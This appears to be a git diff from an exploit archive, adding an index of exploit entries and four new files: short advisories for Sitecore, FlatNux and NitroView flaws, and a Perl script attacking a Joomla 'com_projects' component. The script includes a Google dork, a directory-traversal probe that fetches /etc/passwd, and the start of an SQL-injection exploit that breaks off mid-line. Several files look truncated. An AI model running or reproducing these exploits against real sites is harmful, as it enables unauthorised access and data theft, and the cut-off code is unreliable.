diff --git a/files.csv b/files.csv index baa3175b1..216b9b475 100755 --- a/files.csv +++ b/files.csv @@ -31444,10 +31444,15 @@ id,file,description,date,author,platform,type,port 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34923,platforms/linux/local/34923.c,"Linux Kernel remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 +34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0 +34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 'default.aspx' Cross Site Scripting Vulnerability",2009-06-03,intern0t,php,webapps,0 +34931,platforms/windows/remote/34931.c,"Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-25,"Tyler Borland",windows,remote,0 +34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0 +34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 +34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 diff --git a/platforms/linux/remote/34932.html b/platforms/linux/remote/34932.html new file mode 100755 index 000000000..015e18310 --- /dev/null +++ b/platforms/linux/remote/34932.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44421/info + +NitroView ESM is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied input. + +Successful attacks may allow an attacker to execute arbitrary commands on the appliance in the context of the webserver process. + +NitroView ESM 8.4.0a is affected; other versions may also be vulnerable. + +
[*] Tested on v8.4.0a "NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux" [*] No authentication required [*] "ESSPMDebug=1" in "/usr/local/ess/CPConsoleServer.cfg" required\ No newline at end of file diff --git a/platforms/php/webapps/34930.txt b/platforms/php/webapps/34930.txt new file mode 100755 index 000000000..785a6be73 --- /dev/null +++ b/platforms/php/webapps/34930.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44405/info + +Sitecore CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Sitecore CMS 6.0.0 rev. 090120 is vulnerable; other versions may also be affected. + +http://www.example.com/sitecore/login/default.aspx?sc_error= \ No newline at end of file diff --git a/platforms/php/webapps/34933.txt b/platforms/php/webapps/34933.txt new file mode 100755 index 000000000..e34529b71 --- /dev/null +++ b/platforms/php/webapps/34933.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/44454/info + +FlatNux is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +FlatNux 2009-03-27 is vulnerable; other versions may also be affected. + +http://www.example.com/flatnux/index.php?mod="> +http://www.example.com/flatnux/index.php?mod=login&op=profile&user="> +http://www.example.com/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="> +ttp://www.example.com/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="> diff --git a/platforms/php/webapps/34934.pl b/platforms/php/webapps/34934.pl new file mode 100755 index 000000000..ee6eea045 --- /dev/null +++ b/platforms/php/webapps/34934.pl @@ -0,0 +1,139 @@ +source: http://www.securityfocus.com/bid/44456/info + +The 'com_projects' component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. + +========================================================= +Joomla Component com_projects LFI & SQL Vulnerability +========================================================= + +[+]Title : Joomla Component com_calendrier RFI Vulnerability +[+]Author : jos_ali_joe +[+]Contact : josalijoe@yahoo.com +[+]Home : http://josalijoe.wordpress.com/ +######################################################################## +Dork : inurl:index.php?option="com_projects" +######################################################################## +[ Software Information ] +######################################################################## +[+] Vendor : http://www.codegravity.com/ +[+] Download : http://www.joomla.org/download.html +[+] version : Joomla 1.5 +[+] Vulnerability : LFI and SQL Vulnerability +[+] Dork : com_projects +######################################################################## +[+] Exploit: LFI +==================================================================================== +http://localhost/index.php?option=com_projects&controller=[ LFI ] +==================================================================================== +use LWP::UserAgent; +use HTTP::Request; +use LWP::Simple; + +print "\t\t########################################################\n\n"; +print "\t\t# Joomla Component com_projects LFI Vulnerability #\n\n"; +print "\t\t# by jos_ali_joe #\n\n"; +print "\t\t########################################################\n\n"; + + +if (!$ARGV[0]) +{ +print "Usage: perl idc.pl [HOST]\n"; +print "Example: perl idc.pl http://localhost/LFI/\n";; +} + +else +{ + +$web=$ARGV[0]; +chomp $web; + +$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00"; + +my $web1=$web.$iny; +print "$web1\n\n"; +my $ua = LWP::UserAgent->new; +my $req=HTTP::Request->new(GET=>$web1); +$doc = $ua->request($req)->as_string; + +if ($doc=~ /^root/moxis ){ +print "Web is vuln\n"; +} +else +{ +print "Web is not vuln\n"; +} + +} + +#################################################################################### +[+] Exploit: SQL +==================================================================================== +http://localhost/index.php?option=com_projects&view=project&id=[ SQL ] +==================================================================================== +use IO::Socket; +if(@ARGV < 1){ +print " +[======================================================================== +[// Joomla Component com_projects SQL Injection Exploit +[// Usage: idc.pl [target] +[// Example: idc.pl localhost.com +[// Vuln&Exp : jos_ali_joe +[======================================================================== +"; +exit(); +} +#Local variables +$server = $ARGV[0]; +$server =~ s/(http:\/\/)//eg; +$host = "http://".$server; +$port = "80"; +$file = "/index.php?option=com_projects&view=project&id="; + +print "Script